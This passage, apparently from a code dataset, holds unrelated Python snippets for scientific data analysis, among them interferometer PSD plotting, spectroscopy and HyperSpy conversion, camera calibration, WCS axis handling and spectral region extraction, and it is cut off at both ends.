left')\n plt.title('Solar B PSD - Dynamic,Tilted')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n repdyntilt = d[-1]-d[-2]\n figdyntilt = 
d[-1]\n \n #Temporal with fringes nulled\n fn = glob.glob(parentdir+'Nulled/17*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = np.array([met.readFlatScript(fi.split('.')[0])[0] for fi in fn])\n #Make progressive averaging plot\n plt.figure('TemporalNulledFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Temporal,Nulled')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n reptempnull = d[-1]-d[-2]\n figtempnull = d[-1]\n \n #Dynamic with fringes nulled\n d = pyfits.getdata('/home/rallured/Dropbox/Interferometer/'\n 'SolarBFlat/Repeatability/'\n 'Nulled/170103_Processed.fits')\n rep = np.array([d[i,0]-d[i,1] for i in range(32)])\n #Make progressive averaging plot\n plt.figure('DynamicNulledFigure')\n for i in [0,1,3,7,15,31]:\n f,p = fourier.meanPSD(d[i,0],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(i+1))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Dynamic,Nulled')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n repdynnull = d[-1][0]-d[-1][1]\n figdynnull = d[-1][0]\n\n #Make comparative repeatability plots with 32 averages\n plt.figure('CompareRepeatability')\n f,p = fourier.meanPSD(repdynnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Nulled')\n f,p = fourier.meanPSD(repdyntilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Tilted')\n f,p = fourier.meanPSD(reptemptilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Tilted')\n f,p = fourier.meanPSD(reptempnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Nulled')\n plt.legend(loc='lower left')\n plt.title('Solar B Repeatability - 32 Averages')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n\n #Make comparative figure plots with 32 averages\n plt.figure('CompareFigure')\n f,p = fourier.meanPSD(figdynnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Nulled')\n f,p = fourier.meanPSD(figdyntilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Tilted')\n f,p = fourier.meanPSD(figtemptilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Tilted')\n f,p = fourier.meanPSD(figtempnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Nulled')\n plt.legend(loc='lower left')\n plt.title('Solar B Figure - 32 Averages')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n\n #Make parroting repeatability plots\n fig = plt.figure('Parroting')\n fig.add_subplot(2,2,1)\n plt.imshow(repdyntilt)\n plt.title('Dynamic Repeatability')\n plt.colorbar()\n fig.add_subplot(2,2,2)\n plt.imshow(reptemptilt)\n plt.title('Temporal Repeatability')\n plt.colorbar()\n fig.add_subplot(2,2,3)\n res = legendre2d(repdyntilt,xo=3,yo=3)[0]\n plt.imshow(repdyntilt-res)\n plt.title('Dynamic Repeatability Filtered')\n plt.colorbar()\n fig.add_subplot(2,2,4)\n res = legendre2d(reptemptilt,xo=3,yo=3)[0]\n plt.imshow(reptemptilt-res)\n plt.title('Temporal Repeatability Filtered')\n plt.colorbar()", "def 
_get_dc_offset(self):\n # apply this knowledge to reshape the spectroscopic values\n # remember to reshape such that the dimensions are arranged in reverse order (slow to fast)\n spec_vals_nd, success = reshape_to_n_dims(self._sho_spec_vals[self._sho_all_but_forc_inds,\n self._current_sho_spec_slice],\n h5_spec=self._sho_spec_inds[self._sho_all_but_forc_inds,\n self._current_sho_spec_slice])\n # This should result in a N+1 dimensional matrix where the first index contains the actual data\n # the other dimensions are present to easily slice the data\n spec_labels_sorted = np.hstack(('Dim', self.h5_main.spec_dim_labels))\n if self._verbose:\n print('Spectroscopic dimensions sorted by rate of change:')\n print(spec_labels_sorted)\n # slice the N dimensional dataset such that we only get the DC offset for default values of other dims\n fit_dim_pos = np.argwhere(spec_labels_sorted == self._fit_dim_name)[0][0]\n # fit_dim_slice = list()\n # for dim_ind in range(spec_labels_sorted.size):\n # if dim_ind == fit_dim_pos:\n # fit_dim_slice.append(slice(None))\n # else:\n # fit_dim_slice.append(slice(0, 1))\n\n fit_dim_slice = [fit_dim_pos]\n for idim, dim in enumerate(spec_labels_sorted[1:]):\n if dim == self._fit_dim_name:\n fit_dim_slice.append(slice(None))\n fit_dim_slice[0] = idim\n elif dim in ['FORC', 'FORC_repeat', 'FORC_Cycle']:\n continue\n else:\n fit_dim_slice.append(slice(0, 1))\n\n if self._verbose:\n print('slice to extract Vdc:')\n print(fit_dim_slice)\n\n self.fit_dim_vec = np.squeeze(spec_vals_nd[tuple(fit_dim_slice)])\n\n return", "def odemis_to_hyperspy(filename='sampledata/cltest.h5',specbin=1) :\r\n\r\n f=h5.File(filename,'r')\r\n shome = 'Acquisition2//ImageData/'\r\n x = f[shome + 'Image']\r\n cdesc =f['Acquisition2/PhysicalData/ChannelDescription'].value[0].decode('utf-8')\r\n #print(cdesc)\r\n\r\n cltype = None\r\n if 'Spectrum' in cdesc :\r\n cltype = 'spectrum'\r\n elif 'CL intensity' in cdesc:\r\n cltype = 'panchrom'\r\n\r\n print('<' + filename + '> original shape :' ,x.shape, cltype)\r\n\r\n # strip unused dimensions and transpose/ reverse index order\r\n if cltype == 'panchrom' :\r\n xx=x[0,0,0,:,:].transpose((1,0))\r\n # just an image..\r\n else :\r\n xx=x[:,0,0,:,:].transpose((2,1,0))\r\n\r\n if cltype == 'spectrum' :\r\n #interpolate data to linearize the wavelength scale\r\n w = f[shome + 'DimensionScaleC'].value *1e9\r\n wx = np.linspace(w.min(),w.max(),w.size)\r\n for i in np.arange(xx.shape[0]) :\r\n for k in np.arange(xx.shape[1]) :\r\n xx[i,k,:] = np.interp(wx,w,xx[i,k,:])\r\n\r\n wslope = wx[1]-wx[0]\r\n woffset = wx.min()\r\n #wx = np.arange(w.size)\r\n #wslope,woffset=np.polyfit(wx,w,1)\r\n s = hs.signals.Signal1D(xx)\r\n\r\n elif cltype == 'panchrom' :\r\n s = hs.signals.Signal2D(xx)\r\n else :\r\n print('unknown type')\r\n\r\n print('hyperspy shape :' ,s.data.shape)\r\n\r\n\r\n s.metadata.General.title = 'Odemis: ' + cdesc\r\n s.metadata.General.original_filename = filename\r\n s.metadata.General.notes = cltype\r\n s.axes_manager[0].name = 'pos x'\r\n s.axes_manager[0].scale = f[shome + 'DimensionScaleX'].value * 1e6\r\n s.axes_manager[0].offset = f[shome + 'XOffset'].value * 1e6\r\n s.axes_manager[0].units = 'um'\r\n\r\n\r\n s.axes_manager[1].name = 'pos y'\r\n s.axes_manager[1].scale = f[shome + 'DimensionScaleX'].value * 1e6\r\n s.axes_manager[1].offset = f[shome + 'YOffset'].value * 1e6\r\n s.axes_manager[1].units = 'um'\r\n\r\n if cltype == 'spectrum' :\r\n s.axes_manager[2].name = 'wavelength'\r\n s.axes_manager[2].units = 'nm'\r\n 
s.axes_manager[2].offset = woffset\r\n s.axes_manager[2].scale = wslope\r\n s.metadata.signal_type = 'CL'\r\n\r\n f.close()\r\n if (specbin > 1) and (cltype == 'spectrum'):\r\n return( s.rebin(scale=[1,1,specbin]) )\r\n else :\r\n return( s )\r\n #end odemis_to_hyperspy\r\n #######################\r", "def readShimadzuSection(section):\n xdata = []\n ydata = []\n for line in section:\n tt = line.split()\n if len(tt)==2:\n try:\n x=float(tt[0])\n except ValueError:\n continue\n try:\n y=float(tt[1])\n except ValueError:\n continue\n xdata.append(x)\n ydata.append(y)\n return xdata,ydata", "def raw_orient(\n cal: Calibration,\n cpar: ControlPar,\n nfix: int,\n fix: List[np.ndarray],\n pix: List[Target],\n) -> bool:\n X = np.zeros((10, 6))\n y = np.zeros((10,))\n XPX = np.zeros((6, 6))\n XPy = np.zeros((6,))\n beta = np.zeros((6,))\n itnum = 0\n stopflag = False\n dm = 0.0001\n drad = 0.0001\n cal.added_par.k1 = 0\n cal.added_par.k2 = 0\n cal.added_par.k3 = 0\n cal.added_par.p1 = 0\n cal.added_par.p2 = 0\n cal.added_par.scx = 1\n cal.added_par.she = 0\n\n while not stopflag and itnum < 20:\n itnum += 1\n\n n = 0\n for i in range(nfix):\n xc, yc = pixel_to_metric(pix[i].x, pix[i].y, cpar)\n\n pos = vec_set(fix[i][0], fix[i][1], fix[i][2])\n cal.ext_par.update_rotation_matrix()\n xp, yp = img_coord(pos, cal, cpar.mm)\n\n X[n], X[n + 1] = num_deriv_exterior(cal, cpar, dm, drad, pos)\n y[n], y[n + 1] = xc - xp, yc - yp\n\n n += 2\n\n # void ata (double *a, double *ata, int m, int n, int n_large )\n ata(X, XPX, n, 6, 6)\n if np.any(XPX):\n XPXi = np.linalg.inv(XPX)\n else:\n XPXi = XPX\n\n # atl (double *u, double *a, double *l, int m, int n, int n_large)\n XPy = atl(XPy, X, y, 6)\n beta = XPXi @ XPy\n\n # ata ((double *) X, (double *) XPX, n, 6, 6);\n # matinv ((double *) XPX, 6, 6);\n # atl ((double *) XPy, (double *) X, y, n, 6, 6);\n # matmul ((double *) beta, (double *) XPX, (double *) XPy, 6,6,1,6,6);\n\n stopflag = all(abs(beta) <= 0.1)\n\n cal.ext_par.x0 += beta[0]\n cal.ext_par.y0 += beta[1]\n cal.ext_par.z0 += beta[2]\n cal.ext_par.omega += beta[3]\n cal.ext_par.phi += beta[4]\n cal.ext_par.kappa += beta[5]\n\n if stopflag:\n cal.ext_par.rotation_matrix()\n\n return stopflag", "def CALSPECAbsLineIdentificationinPDF(spectra,pointing,all_titles,object_name,dir_top_images,all_filt,date,figname,tagname,NBIMGPERROW=2):\n \n \n NBSPEC=len(spectra)\n \n MAXIMGROW=max(2,int(m.ceil(float(NBSPEC)/float(NBIMGPERROW))))\n \n \n # fig file specif\n NBIMGROWPERPAGE=5 # number of rows per pages\n PageNum=0 # page counter\n \n figfilename=os.path.join(dir_top_images,figname)\n \n pp = PdfPages(figfilename) # create a pdf file\n \n \n titlepage='WL calibrated 1D Spectra 1D for obj : {} date :{}'.format(object_name,date)\n \n \n all_wl= [] # containers for wavelength\n \n \n for index in np.arange(0,NBSPEC):\n \n \n # new pdf page \n if index%(NBIMGPERROW*NBIMGROWPERPAGE) == 0:\n f, axarr = plt.subplots(NBIMGROWPERPAGE,NBIMGPERROW,figsize=(25,30))\n f.suptitle(titlepage,size=20)\n \n # index of image in the pdf page \n indexcut=index-PageNum*(NBIMGROWPERPAGE*NBIMGPERROW) \n ix=indexcut%NBIMGPERROW\n iy=indexcut/NBIMGPERROW\n \n \n spec = spectra[index]\n \n # calibrate\n grating_name=get_disperser_filtname(all_filt[index])\n X_Size_Pixels=np.arange(spec.shape[0])\n lambdas = Pixel_To_Lambdas(grating_name,X_Size_Pixels,pointing[index],False)\n \n \n all_wl.append(lambdas)\n \n #plot\n axarr[iy,ix].plot(lambdas,spec,'r-',lw=2,label=tagname)\n \n thetitle=\"{} : {} : {} 
\".format(index,all_titles[index],all_filt[index])\n axarr[iy,ix].set_title(thetitle,color='blue',fontweight='bold',fontsize=16)\n \n \n #axarr[iy,ix].text(600.,spec.max()*1.1, all_filt[index],verticalalignment='top', horizontalalignment='left',color='blue',fontweight='bold', fontsize=20)\n axarr[iy,ix].legend(loc='best',fontsize=16)\n axarr[iy,ix].set_xlabel('Wavelength [nm]', fontsize=16)\n axarr[iy,ix].grid(True)\n \n YMIN=0.\n YMAX=spec.max()*1.2\n \n for line in LINES:\n if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA or line == HDELTA or line ==O2B or line == O2Y or line == O2Z:\n axarr[iy,ix].plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='red',lw=0.5)\n axarr[iy,ix].text(line['lambda'],0.9*(YMAX-YMIN),line['label'],verticalalignment='bottom', horizontalalignment='center',color='red', fontweight='bold',fontsize=16)\n \n \n axarr[iy,ix].set_ylim(YMIN,YMAX)\n axarr[iy,ix].set_xlim(np.min(lambdas),np.max(lambdas))\n axarr[iy,ix].set_xlim(0,1200.)\n \n if (index+1)%(NBIMGPERROW*NBIMGROWPERPAGE) == 0:\n PageNum+=1 # increase page Number\n f.savefig(pp, format='pdf')\n f.show()\n \n \n f.savefig(pp, format='pdf') \n f.show()\n pp.close() \n \n return all_wl", "def front_wheel_from_axis():", "def calib2sections(dirname):\n\n if os.path.isfile(dirname):\n return v2calib2sections(dirname)\n\n # Get centres of the sections, and apply corrections.\n s_cen = calib2tensor3(dirname, \"center\") \\\n + calib2tensor3(dirname, \"center_corr\")\n\n # Get the rotation of sections, and apply corrections. Note that\n # sections 0, 1 and 4, 5 are antiparallel!\n s_rot = calib2tensor3(dirname, \"rotation\") \\\n + calib2tensor3(dirname, \"tilt\")\n\n # Get the margin, gap, and shift adjustments of the sections within\n # each quadrant.\n s_mgs = calib2tensor3(dirname, \"marg_gap_shift\")\n\n # Get offsets of the quadrants, and apply corrections.\n q_off = calib2tensor3(dirname, \"offset\") \\\n + calib2tensor3(dirname, \"offset_corr\")\n\n # Get rotation of the quadrants, and apply corrections.\n q_rot = calib2tensor3(dirname, \"quad_rotation\") \\\n + calib2tensor3(dirname, \"quad_tilt\")\n\n # The third coordinate is ignored for now, even though optical\n # measurement gives a variation in Z up to 0.6 mm.\n sections = []\n for q in range(s_cen.shape[0]):\n sections.append([])\n for s in range(s_cen.shape[1]):\n sec = Section()\n sec.translate((s_mgs[0, 0] + s_cen[q, s, 0],\n s_mgs[1, 0] + s_cen[q, s, 1]))\n sec.srotate(s_rot[q, s])\n sec.qrotate(q_rot[q])\n sec.translate((s_mgs[0, 1] + q_off[0, q],\n s_mgs[1, 1] + q_off[1, q]))\n\n # XXX I still don't understand this bit!\n if (q == 0):\n sec.translate((-s_mgs[0, 2] + s_mgs[0, 3],\n -s_mgs[1, 2] - s_mgs[1, 3]))\n elif (q == 1):\n sec.translate((-s_mgs[0, 2] - s_mgs[0, 3],\n +s_mgs[1, 2] - s_mgs[1, 3]))\n elif (q == 2):\n sec.translate((+s_mgs[0, 2] - s_mgs[0, 3],\n +s_mgs[1, 2] + s_mgs[1, 3]))\n elif (q == 3):\n sec.translate((+s_mgs[0, 2] + s_mgs[0, 3],\n -s_mgs[1, 2] + s_mgs[1, 3]))\n\n sections[q].append(sec)\n return (sections)", "def ED(X,Y):", "def get_index_from_well(self, well):\n pass", "def extract_kernel(spec_ds,x,y,width,height,band,transform):\r\n # Modified original code from Zhiqiang Yang (read_spectral) at Oregon State University\r\n xoffset = int(x - transform[0])/30 - width/2\r\n yoffset = int(y - transform[3])/-30 - height/2\r\n\r\n # plot is outside the image boundary\r\n if xoffset <0 or yoffset > spec_ds.RasterYSize - 1:\r\n return [-9999]\r\n this_band = spec_ds.GetRasterBand(band)\r\n specs = 
this_band.ReadAsArray(xoffset, yoffset, width, height)\r\n return specs", "def _get_orientations(self):\n for atom in self.invarioms:\n atom.get_orientation()", "def test_get_dim_index_with_label(self):\n\n dim = self.oecd_datasets['oecd']['dimension']['id'][0]\n dims_df = pyjstat.get_dim_index(self.oecd_datasets['oecd'], dim)\n self.assertTrue(dims_df.iloc[0]['id'] == 'UNR')\n self.assertTrue(dims_df.iloc[-1]['index'] == 0)", "def _output_axes(self, in_obj, pad_int):\n output_axes = ng.make_axes()\n for ax in in_obj.axes:\n name = ax.name\n if name in self.conv_axis_names:\n output_axes += ng.make_axis(name=ax.name,\n length=utils.conv_output_dim(\n ax.length,\n self.filter_spatial_shape[name],\n pad_int[name],\n self.strides[name],\n False,\n self.dilation[name]))\n elif name == \"C\":\n output_axes += ng.make_axis(name=name, length=self.nout)\n else:\n output_axes += ax\n return output_axes", "def ActiveHlt1Lines(self) :\n lines = ['Hlt1IncPhi','Hlt1CalibTracking']\n\n return lines", "def _get_out_segments(self):\n return self.__out_segments", "def consecutive_sections(): # noqa: D416", "def split_axis(input_shape):\n d = input_shape[-1]\n split_axis = [70] * (d // 70)\n if d % 70 > 0:\n split_axis.append(int(d % 70))\n return split_axis", "def get_axis(header, axis):\n \n logger = logging.getLogger(__name__)\n \n logger.debug(\"Will extract axis: {}.\".format(axis))\n \n wcs = WCS(header)\n\n wcs_arr_shape = wcs.array_shape\n logger.debug(\"WCS array shape: {}\".format(wcs_arr_shape))\n n_axis = wcs.array_shape[-axis]\n logger.debug(\"Axis should have {} elements.\".format(n_axis))\n if len(wcs_arr_shape) > 3:\n axis_vals = wcs.pixel_to_world_values(np.c_[np.zeros(n_axis), np.zeros(n_axis), np.arange(0,n_axis), np.zeros(n_axis)])\n else:\n axis_vals = wcs.pixel_to_world_values(np.c_[np.zeros(n_axis), np.zeros(n_axis), np.arange(0,n_axis)])\n\n axis_vals = np.asarray(axis_vals)\n axis_vals = axis_vals[:,axis-1]\n \n return axis_vals", "def orient_img_hwd(data, slice_axis):\n if slice_axis == 0:\n return data.transpose(2, 1, 0)\n elif slice_axis == 1:\n return data.transpose(2, 0, 1)\n elif slice_axis == 2:\n return data", "def display(self,anchor_name = ANCHOR_NAME ,mode = '2D'):\n res = self.read_mes()\n \n \n \n \n ref_points = res[0]\n positions = res[1]\n \n \n \n # print(ref_points)\n # print(rangings)\n out = [] # will be returned\n measured_positions = [] # measured ranging value for the reference point\n real_positions = [] # real ranging value for the reference point\n \n #abs_standard_deviation = []\n #relative_standard_deviation = []\n \n abs_accuracies = []\n #relative_accuracies = []\n \n #angles = angle(ref_points,anchor_name)\n \n for (i,rp) in enumerate(ref_points):\n serie = positions[i]\n \n (real_position,mean_position,mean_accuracy) = self.extract_serie(serie,rp)\n \n # getting error for anchor A\n #print(get_ranging_error('A',mean_position,rp) )\n measured_positions.append(mean_position)\n real_positions.append(real_position)\n abs_accuracies.append(mean_accuracy)\n \n global_accuracy = np.mean(abs_accuracies)\n print(\"average accuracy :\" + str(global_accuracy) )\n \n \n \n \n # displaying averaged values\n \n \n \n \n \n \n measured_x = []\n measured_y = []\n measured_z = []\n real_x = []\n real_y = []\n real_z = []\n for pos in measured_positions:\n (x,y,z) = pos\n measured_x.append(x)\n measured_y.append(y)\n measured_z.append(z)\n \n for pos in real_positions:\n (x,y,z) = pos\n real_x.append(x)\n real_y.append(y)\n real_z.append(z)\n \n \n \n \n \n \n \n if 
(mode == '2D'):\n \n \n \n # plotting results\n \n # creating figures \n fig1 = plt.figure(\"Accuracy\")\n fig2 = plt.figure(\"Positions\") \n \n # creating axes \n ax1 = fig1.add_subplot(111,projection='3d')\n ax1.view_init(elev = 45, azim = 240)\n ax1.set_title(\"absolute accuracy\")\n ax1.plot(real_x[:],real_y[:],abs_accuracies[:])\n \n \n \n \n \n ax2 = fig2.add_subplot(111)\n ax2.set_title(\"Real positions\")\n ax2.scatter(real_x[:],real_y[:])\n \n ax2 = fig2.add_subplot(111)\n ax2.set_title(\"Measured positions\")\n ax2.scatter(measured_x[:],measured_y[:])\n \n \n \n \n \n \n \n if (mode == '3D'):\n # plotting results\n \n # creating figures \n fig1 = plt.figure(\"Accuracy\")\n fig2 = plt.figure(\"Positions\") \n \n # creating axes \n ax1 = fig1.add_subplot(111,projection='3d')\n ax1.view_init(elev = 45, azim = 240)\n ax1.set_title(\"absolute accuracy\")\n ax1.plot(real_x[:],real_y[:],abs_accuracies[:])\n \n \n \n \n \n ax2 = fig2.add_subplot(111,projection='3d')\n ax2.view_init(elev = 45, azim = 240)\n ax2.set_title(\"Real positions\")\n ax2.scatter(real_x[:],real_y[:],real_z[:])\n \n ax2 = fig2.add_subplot(111,projection='3d')\n ax2.view_init(elev = 45, azim = 240)\n ax2.set_title(\"Measured positions\")\n ax2.scatter(measured_x[:],measured_y[:],measured_z[:])\n \n \n \n if (DISPLAY): \n plt.show()\n \n \n return(out)", "def _secondary_beam(self, hdr):\n # Called ApSecondaryNano in OpenMIMS\n d = {}\n tmp = unpack(self._bo + 'd 42i 2d', hdr.read(192))\n d['E0W'], d['ES'] = tmp[:2]\n d['ES widths'] = tmp[2:12]\n d['ES heights'] = tuple(tmp[12:22])\n d['AS'] = tmp[22]\n d['AS widths'] = tuple(tmp[23:33])\n d['AS heights'] = tuple(tmp[33:43])\n d['EnS'], d['EnS width'] = tmp[43:]\n return d", "def test_find_dispersion_axis():\n wavelengths = np.arange(100) * 0.1 + np.exp(0.1) * 13.0\n # [14.36722193, 14.46722193, 14.56722193, ... 
24.16722193, 24.26722193]\n\n wavelengths_horizontal = np.tile(wavelengths, 15).reshape(15, 100)\n assert find_dispersion_axis(wavelengths_horizontal) == 0\n\n wavelengths_vertical = np.repeat(wavelengths, 15).reshape(100, 15)\n assert find_dispersion_axis(wavelengths_vertical) == 1\n\n # Make sure it works for decreasing wavelengths\n assert find_dispersion_axis(np.fliplr(wavelengths_horizontal)) == 0\n assert find_dispersion_axis(np.flipud(wavelengths_vertical)) == 1\n\n # Make sure it works if there are NaNs\n wavelengths_horizontal[:,0] = np.nan\n assert find_dispersion_axis(wavelengths_horizontal) == 0\n\n wavelengths_vertical[:,0] = np.nan\n assert find_dispersion_axis(wavelengths_vertical) == 1\n\n # Make sure if wavelengths don't change it produces an error\n wavelengths_zeros = np.zeros((15, 100))\n with pytest.raises(RuntimeError):\n find_dispersion_axis(wavelengths_zeros)", "def extract_spec(data, region, naxis, mode):\n \n logger = logging.getLogger(__name__)\n \n logger.debug('Data shape: {0}'.format(data.shape))\n \n if region['shape'] == 'point':\n if naxis > 3:\n spec = data[:,:,region['params']['cy'],region['params']['cx']]\n if mode == 'sum':\n spec = spec.sum(axis=0)\n elif mode == 'avg':\n spec = spec.mean(axis=0)\n elif 'flux' in mode.lower():\n spec = spec.sum(axis=0)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n elif naxis == 3:\n spec = data[:,region['params']['cy'],region['params']['cx']]\n else:\n spec = data[region['params']['cy'],region['params']['cx']]\n \n elif region['shape'] == 'box':\n area = (region['params']['trcy'] - region['params']['blcy']) * \\\n (region['params']['trcx'] - region['params']['blcx'])\n \n if naxis > 3:\n spec = data[0,:,region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n \n if mode == 'sum':\n spec = spec.sum(axis=2).sum(axis=1)\n elif mode == 'avg':\n spec = spec.mean(axis=2).mean(axis=1)\n elif 'flux' in mode.lower():\n spec = spec.sum(axis=2).sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif naxis == 3:\n spec = data[:,region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n if mode == 'sum':\n spec = spec.sum(axis=2).sum(axis=1)#/area\n elif mode == 'avg':\n spec = spec.mean(axis=2).mean(axis=1)#/area\n elif 'flux' in mode.lower():\n summ = spec.sum(axis=2).sum(axis=1)\n logger.info('Sum of pixels: {0}'.format(summ))\n spec = summ/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n else:\n spec = data[region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n if mode == 'sum':\n spec = spec.sum()\n elif mode == 'avg':\n spec = spec.mean()\n elif 'flux' in mode.lower():\n spec = spec.sum()/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif region['shape'] == 'circle':\n logger.info(\"Circular region has a center \" \\\n \"at pixel ({0},{1}) with radius \" \\\n \"{2}\".format(region['params']['cx'], \n region['params']['cy'], \n region['params']['r']))\n \n if naxis > 3:\n logger.debug(\"The image has more than 3 axes.\")\n mask = sector_mask(data[0,0].shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = data[0][:,mask]\n logger.debug(\"Masked data shape: 
{0}\".format(mdata.shape))\n if 'sum' in mode.lower():\n spec = mdata.sum(axis=1)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1)/region['barea']\n \n elif naxis == 3:\n \n mask = sector_mask(data[0].shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = data[:,mask]\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n if 'sum' in mode.lower():\n spec = mdata.sum(axis=1)#/len(np.where(mask.flatten() == 1)[0])\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n else:\n \n mask = sector_mask(data.shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = np.ma.masked_invalid(data[mask])\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n logger.debug(\"Masked data sum: {0}\".format(mdata))\n if 'sum' in mode.lower():\n spec = mdata.sum()#/len(np.where(mask.flatten() == 1)[0])\n elif 'avg' in mode.lower():\n spec = mdata.mean()\n elif 'flux' in mode.lower():\n spec = mdata.sum()/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif region['shape'] == 'ellipse':\n logger.info(\"Elliptical region has a center \" \\\n \"at pixel ({0},{1}) with major and minor axes \" \\\n \"{2} and {3} at an angle {4}\".format(region['params']['cx'], \n region['params']['cy'], \n region['params']['bmaj'],\n region['params']['bmin'],\n region['params']['theta']))\n \n logger.debug(\"Mask shape: {}\".format(data.shape[-2:]))\n mask = ellipse_mask(data.shape[-2:],\n region['params']['cy'], region['params']['cx'],\n region['params']['bmaj']/2., region['params']['bmin']/2.,\n region['params']['theta'])\n logger.debug('Elements in mask: {}'.format(mask.sum()))\n \n if naxis > 3:\n mdata = data[0][:,mask]\n axis = 1\n elif naxis == 3:\n mdata = data[:,mask]\n axis = 1\n else:\n mdata = data[mask]\n axis = 0\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n \n if 'sum' in mode.lower():\n spec = mdata.sum(axis=axis)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=axis)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=axis)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif 'poly' in region['shape']:\n npolys = len(region['params']['Polygons'])\n \n if naxis > 3:\n shape = data[0][0].shape\n npix3 = data[0].shape[0]\n elif naxis == 3:\n shape = data[0].shape\n npix3 = data.shape[0]\n else:\n shape = data.shape\n npix3 = 0\n \n mask = np.zeros(shape)\n \n for poly in region['params']['Polygons']:\n # Add all the polygons together\n logger.info(\"Adding polygons to the mask.\")\n mask += poly.make_mask(shape)\n \n logger.info(\"Normalizing the mask to unity.\")\n mask = np.ceil(mask/npolys)\n \n if naxis > 3:\n mdata = data[0]*np.tile(mask, (npix3,1,1))\n else:\n mdata = data*np.tile(mask, (npix3,1,1))\n \n if mode == 'sum':\n spec = mdata.sum(axis=1).sum(axis=1)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1).mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1).sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif 'all' in region['shape']:\n \n if naxis > 3:\n data = data[0]\n spec = proc_data(data, 
mode, region)\n elif naxis == 3:\n data = data\n spec = proc_data(data, mode, region)\n else:\n spec = proc_data(data, mode, region)\n \n return spec", "def undulations(**kwargs):\n\n\t#---parameters\n\tsn = kwargs['sn']\n\twork = kwargs['workspace']\n\tcalc = kwargs['calc']\n\tupname = 'lipid_abstractor'\n\tgrid_spacing = calc['specs']['grid_spacing']\n\tvecs = datmerge(kwargs,upname,'vecs')\n\tnframes = int(np.sum(datmerge(kwargs,upname,'nframes')))\n\ttrajectory = datmerge(kwargs,upname,'points')\n\tattrs,result = {},{}\n\t#---! hacking through error with monolayer separation\n\ttry: monolayer_indices = kwargs['upstream'][upname+'0']['monolayer_indices']\n\texcept: monolayer_indices = kwargs['upstream'][upname]['monolayer_indices']\n\t#---choose grid dimensions\n\tgrid = np.array([round(i) for i in np.mean(vecs,axis=0)/grid_spacing])[:2]\n\t#---! removed timeseries from result for new version of omnicalc\n\t#---parallel\n\tmesh = [[],[]]\n\tfor mn in range(2):\n\t\tstart = time.time()\n\t\tmesh[mn] = Parallel(n_jobs=work.nprocs,verbose=0,require='sharedmem')(\n\t\t\tdelayed(makemesh_regular)(\n\t\t\t\ttrajectory[fr][np.where(monolayer_indices==mn)],vecs[fr],grid)\n\t\t\tfor fr in framelooper(nframes,start=start,text='monolayer %d, 